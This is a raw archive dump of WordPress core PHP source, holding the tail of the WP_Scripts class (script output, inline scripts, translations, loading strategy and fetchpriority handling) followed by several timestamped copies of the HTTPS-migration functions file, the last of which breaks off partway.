* @see WP_Dependencies::do_item()
*
* @param string $handle The script's registered handle.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function do_item( $handle, $group = false ) {
if ( ! parent::do_item( $handle ) ) {
return false;
}
if ( 0 === $group && $this->groups[ $handle ] > 0 ) {
$this->in_footer[] = $handle;
return false;
}
if ( false === $group && in_array( $handle, $this->in_footer, true ) ) {
$this->in_footer = array_diff( $this->in_footer, (array) $handle );
}
$obj = $this->registered[ $handle ];
if ( $obj->extra['conditional'] ?? false ) {
return false;
}
if ( null === $obj->ver ) {
$ver = '';
} else {
$ver = $obj->ver ? $obj->ver : $this->default_version;
}
if ( isset( $this->args[ $handle ] ) ) {
$ver = $ver ? $ver . '&' . $this->args[ $handle ] : $this->args[ $handle ];
}
$src = $obj->src;
$strategy = $this->get_eligible_loading_strategy( $handle );
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
if ( ! $this->is_delayed_strategy( $intended_strategy ) ) {
$intended_strategy = '';
}
/*
* Move this script to the footer if:
* 1. The script is in the header group.
* 2. The current output is the header.
* 3. The intended strategy is delayed.
* 4. The actual strategy is not delayed.
* 5. All dependent scripts are in the footer.
*/
if (
0 === $group &&
0 === $this->groups[ $handle ] &&
$intended_strategy &&
! $this->is_delayed_strategy( $strategy ) &&
$this->are_all_dependents_in_footer( $handle )
) {
$this->in_footer[] = $handle;
return false;
}
$before_script = $this->get_inline_script_tag( $handle, 'before' );
$after_script = $this->get_inline_script_tag( $handle, 'after' );
if ( $before_script || $after_script ) {
$inline_script_tag = $before_script . $after_script;
} else {
$inline_script_tag = '';
}
/*
* Prevent concatenation of scripts if the text domain is defined
* to ensure the dependency order is respected.
*/
$translations_stop_concat = ! empty( $obj->textdomain );
$translations = $this->print_translations( $handle, false );
if ( $translations ) {
/*
* The sourceURL comment is not included by WP_Scripts::print_translations()
* when `$display` is `false` to prevent issues where the script tag contents are used
* by extenders for other purposes, for example concatenated with other script content.
*
* Include the sourceURL comment here as it would be when printed directly.
*/
$source_url = rawurlencode( "{$handle}-js-translations" );
$translations .= "\n//# sourceURL={$source_url}";
$translations = wp_get_inline_script_tag( $translations, array( 'id' => "{$handle}-js-translations" ) );
}
if ( $this->do_concat ) {
/**
* Filters the script loader source.
*
* @since 2.2.0
*
* @param string $src Script loader source path.
* @param string $handle Script handle.
*/
$filtered_src = apply_filters( 'script_loader_src', $src, $handle );
if (
$this->in_default_dir( $filtered_src )
&& ( $before_script || $after_script || $translations_stop_concat || $this->is_delayed_strategy( $strategy ) )
) {
$this->do_concat = false;
// Have to print the so-far concatenated scripts right away to maintain the right order.
_print_scripts();
$this->reset();
} elseif ( $this->in_default_dir( $filtered_src ) ) {
$this->print_code .= $this->print_extra_script( $handle, false );
$this->concat .= "$handle,";
$this->concat_version .= "$handle$ver";
return true;
} else {
$this->ext_handles .= "$handle,";
$this->ext_version .= "$handle$ver";
}
}
$this->print_extra_script( $handle );
// A single item may alias a set of items, by having dependencies, but no source.
if ( ! $src ) {
if ( $inline_script_tag ) {
if ( $this->do_concat ) {
$this->print_html .= $inline_script_tag;
} else {
echo $inline_script_tag;
}
}
return true;
}
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $this->content_url && str_starts_with( $src, $this->content_url ) ) ) {
$src = $this->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url_raw( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
return true;
}
$attr = array(
'src' => $src,
'id' => "{$handle}-js",
);
if ( $strategy ) {
$attr[ $strategy ] = true;
}
if ( $intended_strategy ) {
$attr['data-wp-strategy'] = $intended_strategy;
}
// Determine fetchpriority.
$original_fetchpriority = isset( $obj->extra['fetchpriority'] ) ? $obj->extra['fetchpriority'] : null;
if ( null === $original_fetchpriority || ! $this->is_valid_fetchpriority( $original_fetchpriority ) ) {
$original_fetchpriority = 'auto';
}
$actual_fetchpriority = $this->get_highest_fetchpriority_with_dependents( $handle );
if ( null === $actual_fetchpriority ) {
// If null, it's likely this script was not explicitly enqueued, so in this case use the original priority.
$actual_fetchpriority = $original_fetchpriority;
}
if ( is_string( $actual_fetchpriority ) && 'auto' !== $actual_fetchpriority ) {
$attr['fetchpriority'] = $actual_fetchpriority;
}
if ( $original_fetchpriority !== $actual_fetchpriority ) {
$attr['data-wp-fetchpriority'] = $original_fetchpriority;
}
$tag = $translations . $before_script;
$tag .= wp_get_script_tag( $attr );
$tag .= $after_script;
/**
* Filters the HTML script tag of an enqueued script.
*
* @since 4.1.0
*
* @param string $tag The `<script>` tag for the enqueued script.
* @param string $handle The script's registered handle.
* @param string $src The script's source URL.
*/
$tag = apply_filters( 'script_loader_tag', $tag, $handle, $src );
if ( $this->do_concat ) {
$this->print_html .= $tag;
} else {
echo $tag;
}
return true;
}
/**
* Adds extra code to a registered script.
*
* @since 4.5.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return bool True on success, false on failure.
*/
public function add_inline_script( $handle, $data, $position = 'after' ) {
if ( ! $data ) {
return false;
}
if ( 'after' !== $position ) {
$position = 'before';
}
$script = (array) $this->get_data( $handle, $position );
$script[] = $data;
return $this->add_data( $handle, $position, $script );
}
/**
* Prints inline scripts registered for a specific handle.
*
* @since 4.5.0
* @deprecated 6.3.0 Use methods get_inline_script_tag() or get_inline_script_data() instead.
*
* @param string $handle Name of the script to print inline scripts for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @param bool $display Optional. Whether to print the script tag
* instead of just returning the script data. Default true.
* @return string|false Script data on success, false otherwise.
*/
public function print_inline_script( $handle, $position = 'after', $display = true ) {
_deprecated_function( __METHOD__, '6.3.0', 'WP_Scripts::get_inline_script_data() or WP_Scripts::get_inline_script_tag()' );
$output = $this->get_inline_script_data( $handle, $position );
if ( empty( $output ) ) {
return false;
}
if ( $display ) {
echo $this->get_inline_script_tag( $handle, $position );
}
return $output;
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_data( $handle, $position = 'after' ) {
$data = $this->get_data( $handle, $position );
if ( empty( $data ) || ! is_array( $data ) ) {
return '';
}
/*
* Print sourceURL comment regardless of concatenation.
*
* Inline scripts prevent scripts from being concatenated, so
* sourceURL comments are safe to print for inline scripts.
*/
$data[] = sprintf(
'//# sourceURL=%s',
rawurlencode( "{$handle}-js-{$position}" )
);
return trim( implode( "\n", $data ), "\n" );
}
/**
* Gets tags for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get associated inline script tag for.
* Must be lowercase.
* @param string $position Optional. Whether to get tag for inline
* scripts in the before or after position. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_tag( $handle, $position = 'after' ) {
$js = $this->get_inline_script_data( $handle, $position );
if ( empty( $js ) ) {
return '';
}
$id = "{$handle}-js-{$position}";
return wp_get_inline_script_tag( $js, compact( 'id' ) );
}
/**
* Localizes a script, only if the script has already been added.
*
* @since 2.1.0
*
* @param string $handle Name of the script to attach data to.
* @param string $object_name Name of the variable that will contain the data.
* @param array $l10n Array of data to localize.
* @return bool True on success, false on failure.
*/
public function localize( $handle, $object_name, $l10n ) {
if ( 'jquery' === $handle ) {
$handle = 'jquery-core';
}
if ( is_array( $l10n ) && isset( $l10n['l10n_print_after'] ) ) { // back compat, preserve the code in 'l10n_print_after' if present.
$after = $l10n['l10n_print_after'];
unset( $l10n['l10n_print_after'] );
}
if ( ! is_array( $l10n ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $l10n, 2: wp_add_inline_script() */
__( 'The %1$s parameter must be an array. To pass arbitrary data to scripts, use the %2$s function instead.' ),
'<code>$l10n</code>',
'<code>wp_add_inline_script()</code>'
),
'5.7.0'
);
if ( false === $l10n ) {
// This should really not be needed, but is necessary for backward compatibility.
$l10n = array( $l10n );
}
}
if ( is_string( $l10n ) ) {
$l10n = html_entity_decode( $l10n, ENT_QUOTES, 'UTF-8' );
} elseif ( is_array( $l10n ) ) {
foreach ( $l10n as $key => $value ) {
if ( ! is_scalar( $value ) ) {
continue;
}
$l10n[ $key ] = html_entity_decode( (string) $value, ENT_QUOTES, 'UTF-8' );
}
}
$script = "var $object_name = " . wp_json_encode( $l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ';';
if ( ! empty( $after ) ) {
$script .= "\n$after;";
}
$data = $this->get_data( $handle, 'data' );
if ( ! empty( $data ) ) {
$script = "$data\n$script";
}
return $this->add_data( $handle, 'data', $script );
}
/**
* Sets handle group.
*
* @since 2.8.0
*
* @see WP_Dependencies::set_group()
*
* @param string $handle Name of the item. Should be unique.
* @param bool $recursion Internal flag that calling function was called recursively.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool Not already in the group or a lower group.
*/
public function set_group( $handle, $recursion, $group = false ) {
if ( isset( $this->registered[ $handle ]->args ) && 1 === $this->registered[ $handle ]->args ) {
$calculated_group = 1;
} else {
$calculated_group = (int) $this->get_data( $handle, 'group' );
}
if ( false !== $group && $calculated_group > $group ) {
$calculated_group = $group;
}
return parent::set_group( $handle, $recursion, $calculated_group );
}
/**
* Sets a translation textdomain.
*
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @param string $handle Name of the script to register a translation domain to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was registered, false if not.
*/
public function set_translations( $handle, $domain = 'default', $path = '' ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
/** @var \_WP_Dependency $obj */
$obj = $this->registered[ $handle ];
if ( ! in_array( 'wp-i18n', $obj->deps, true ) ) {
$obj->deps[] = 'wp-i18n';
}
return $obj->set_translations( $domain, $path );
}
/**
* Prints translations set for a specific handle.
*
* @since 5.0.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param bool $display Optional. Whether to print the script
* instead of just returning it. Default true.
* @return string|false Script on success, false otherwise.
*/
public function print_translations( $handle, $display = true ) {
if ( ! isset( $this->registered[ $handle ] ) || empty( $this->registered[ $handle ]->textdomain ) ) {
return false;
}
$domain = $this->registered[ $handle ]->textdomain;
$path = '';
if ( isset( $this->registered[ $handle ]->translations_path ) ) {
$path = $this->registered[ $handle ]->translations_path;
}
$json_translations = load_script_textdomain( $handle, $domain, $path );
if ( ! $json_translations ) {
return false;
}
$output = <<<JS
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "{$domain}", {$json_translations} );
JS;
if ( $display ) {
$source_url = rawurlencode( "{$handle}-js-translations" );
$output .= "\n//# sourceURL={$source_url}";
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-translations" ) );
}
return $output;
}
/**
* Determines script dependencies.
*
* @since 2.1.0
*
* @see WP_Dependencies::all_deps()
*
* @param string|string[] $handles Item handle (string) or item handles (array of strings).
* @param bool $recursion Optional. Internal flag that function is calling itself.
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function all_deps( $handles, $recursion = false, $group = false ) {
$result = parent::all_deps( $handles, $recursion, $group );
if ( ! $recursion ) {
/**
* Filters the list of script dependencies left to print.
*
* @since 2.3.0
*
* @param string[] $to_do An array of script dependency handles.
*/
$this->to_do = apply_filters( 'print_scripts_array', $this->to_do );
}
return $result;
}
/**
* Processes items and dependencies for the head group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_head_items() {
$this->do_items( false, 0 );
return $this->done;
}
/**
* Processes items and dependencies for the footer group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_footer_items() {
$this->do_items( false, 1 );
return $this->done;
}
/**
* Whether a handle's source is in a default directory.
*
* @since 2.8.0
*
* @param string $src The source of the enqueued script.
* @return bool True if found, false if not.
*/
public function in_default_dir( $src ) {
if ( ! $this->default_dirs ) {
return true;
}
if ( str_starts_with( $src, '/' . WPINC . '/js/l10n' ) ) {
return false;
}
foreach ( (array) $this->default_dirs as $test ) {
if ( str_starts_with( $src, $test ) ) {
return true;
}
}
return false;
}
/**
* This overrides the add_data method from WP_Dependencies, to support normalizing of $args.
*
* @since 6.3.0
*
* @param string $handle Name of the item. Should be unique.
* @param string $key The data key.
* @param mixed $value The data value.
* @return bool True on success, false on failure.
*/
public function add_data( $handle, $key, $value ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
if ( 'conditional' === $key ) {
// If a dependency is declared by a conditional script, remove it.
$this->registered[ $handle ]->deps = array();
}
if ( 'strategy' === $key ) {
if ( ! empty( $value ) && ! $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Invalid strategy `%1$s` defined for `%2$s` during script registration.' ),
$value,
$handle
),
'6.3.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src && $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Cannot supply a strategy `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
$value,
$handle
),
'6.3.0'
);
return false;
}
} elseif ( 'fetchpriority' === $key ) {
if ( empty( $value ) ) {
$value = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Cannot supply a fetchpriority `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
}
}
return parent::add_data( $handle, $key, $value );
}
/**
* Gets all dependents of a script.
*
* This is not recursive.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string[] Script handles.
*/
private function get_dependents( $handle ) {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $handle ] ) ) {
return $this->dependents_map[ $handle ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_handle => $args ) {
if ( in_array( $handle, $args->deps, true ) ) {
$dependents[] = $registered_handle;
}
}
// Add the handles dependents to the map to ease future lookups.
$this->dependents_map[ $handle ] = $dependents;
return $dependents;
}
/**
* Checks if the strategy passed is a valid delayed (non-blocking) strategy.
*
* @since 6.3.0
*
* @param string|mixed $strategy The strategy to check.
* @return bool True if $strategy is one of the delayed strategies, otherwise false.
*/
private function is_delayed_strategy( $strategy ): bool {
return in_array(
$strategy,
$this->delayed_strategies,
true
);
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, array( 'auto', 'low', 'high' ), true );
}
/**
* Gets the best eligible loading strategy for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string The best eligible loading strategy.
*/
private function get_eligible_loading_strategy( $handle ) {
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
// Bail early if there is no intended strategy.
if ( ! $intended_strategy ) {
return '';
}
/*
* If the intended strategy is 'defer', limit the initial list of eligible
* strategies, since 'async' can fallback to 'defer', but not vice-versa.
*/
$initial_strategy = ( 'defer' === $intended_strategy ) ? array( 'defer' ) : null;
$eligible_strategies = $this->filter_eligible_strategies( $handle, $initial_strategy );
// Return early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return '';
}
return in_array( 'async', $eligible_strategies, true ) ? 'async' : 'defer';
}
/**
* Filter the list of eligible loading strategies for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @param string[]|null $eligible_strategies Optional. The list of strategies to filter. Default null.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string[]> $stored_results Optional. An array of already computed eligible loading strategies by handle, used to increase performance in large dependency lists.
* @return string[] A list of eligible loading strategies that could be used.
*/
private function filter_eligible_strategies( $handle, $eligible_strategies = null, $checked = array(), array &$stored_results = array() ) {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If no strategies are being passed, all strategies are eligible.
if ( null === $eligible_strategies ) {
$eligible_strategies = $this->delayed_strategies;
}
// If this handle was already checked, return early.
if ( isset( $checked[ $handle ] ) ) {
return $eligible_strategies;
}
// Mark this handle as checked.
$checked[ $handle ] = true;
// If this handle isn't registered, don't filter anything and return.
if ( ! isset( $this->registered[ $handle ] ) ) {
return $eligible_strategies;
}
// If the handle is not enqueued, don't filter anything and return.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return $eligible_strategies;
}
$is_alias = (bool) ! $this->registered[ $handle ]->src;
$intended_strategy = $this->get_data( $handle, 'strategy' );
// For non-alias handles, an empty intended strategy filters all strategies.
if ( ! $is_alias && empty( $intended_strategy ) ) {
return array();
}
// Handles with inline scripts attached in the 'after' position cannot be delayed.
if ( $this->has_inline_script( $handle, 'after' ) ) {
return array();
}
// If the intended strategy is 'defer', filter out 'async'.
if ( 'defer' === $intended_strategy ) {
$eligible_strategies = array( 'defer' );
}
$dependents = $this->get_dependents( $handle );
// Recursively filter eligible strategies for dependents.
foreach ( $dependents as $dependent ) {
// Bail early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return array();
}
$eligible_strategies = $this->filter_eligible_strategies( $dependent, $eligible_strategies, $checked, $stored_results );
}
$stored_results[ $handle ] = $eligible_strategies;
return $eligible_strategies;
}
/**
* Gets the highest fetch priority for a given script and all of its dependent scripts.
*
* @since 6.9.0
* @see self::filter_eligible_strategies()
* @see WP_Script_Modules::get_highest_fetchpriority()
*
* @param string $handle Script module ID.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string> $stored_results Optional. An array of already computed max priority by handle, used to increase performance in large dependency lists.
* @return string|null Highest fetch priority for the script and its dependents.
*/
private function get_highest_fetchpriority_with_dependents( string $handle, array $checked = array(), array &$stored_results = array() ): ?string {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If there is a recursive dependency, return early.
if ( isset( $checked[ $handle ] ) ) {
return null;
}
// Mark this handle as checked to guard against infinite recursion.
$checked[ $handle ] = true;
// Abort if the script is not enqueued or a dependency of an enqueued script.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return null;
}
$fetchpriority = $this->get_data( $handle, 'fetchpriority' );
if ( ! $this->is_valid_fetchpriority( $fetchpriority ) ) {
$fetchpriority = 'auto';
}
static $priorities = array(
'low',
'auto',
'high',
);
$high_priority_index = count( $priorities ) - 1;
$highest_priority_index = (int) array_search( $fetchpriority, $priorities, true );
if ( $highest_priority_index !== $high_priority_index ) {
foreach ( $this->get_dependents( $handle ) as $dependent_handle ) {
$dependent_priority = $this->get_highest_fetchpriority_with_dependents( $dependent_handle, $checked, $stored_results );
if ( is_string( $dependent_priority ) ) {
$highest_priority_index = max(
$highest_priority_index,
(int) array_search( $dependent_priority, $priorities, true )
);
if ( $highest_priority_index === $high_priority_index ) {
break;
}
}
}
}
$stored_results[ $handle ] = $priorities[ $highest_priority_index ]; // @phpstan-ignore parameterByRef.type (We know the index is valid and that this will be a string.)
return $priorities[ $highest_priority_index ];
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for. Must be lowercase.
* @param string $position The position of the inline script.
* @return bool Whether the handle has an inline script (either before or after).
*/
private function has_inline_script( $handle, $position = null ) {
if ( $position && in_array( $position, array( 'before', 'after' ), true ) ) {
return (bool) $this->get_data( $handle, $position );
}
return (bool) ( $this->get_data( $handle, 'before' ) || $this->get_data( $handle, 'after' ) );
}
/**
* Resets class properties.
*
* @since 2.8.0
*/
public function reset() {
$this->do_concat = false;
$this->print_code = '';
$this->concat = '';
$this->concat_version = '';
$this->print_html = '';
$this->ext_version = '';
$this->ext_handles = '';
}
/**
* Gets a script-specific dependency warning message.
*
* @since 6.9.1
*
* @param string $handle Script handle with missing dependencies.
* @param string[] $missing_dependency_handles Missing dependency handles.
* @return string Formatted, localized warning message.
*/
protected function get_dependency_warning_message( $handle, $missing_dependency_handles ) {
return sprintf(
/* translators: 1: Script handle, 2: List of missing dependency handles. */
__( 'The script with the handle "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$handle,
implode( wp_get_list_item_separator(), $missing_dependency_handles )
);
}
}
https-migration-20260605140532-20260621081206.php 0000666 00000011205 15224151221 0013346 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260621081125.php 0000666 00000011205 15224151221 0011765 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606103247.php 0000666 00000011205 15224151221 0011770 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
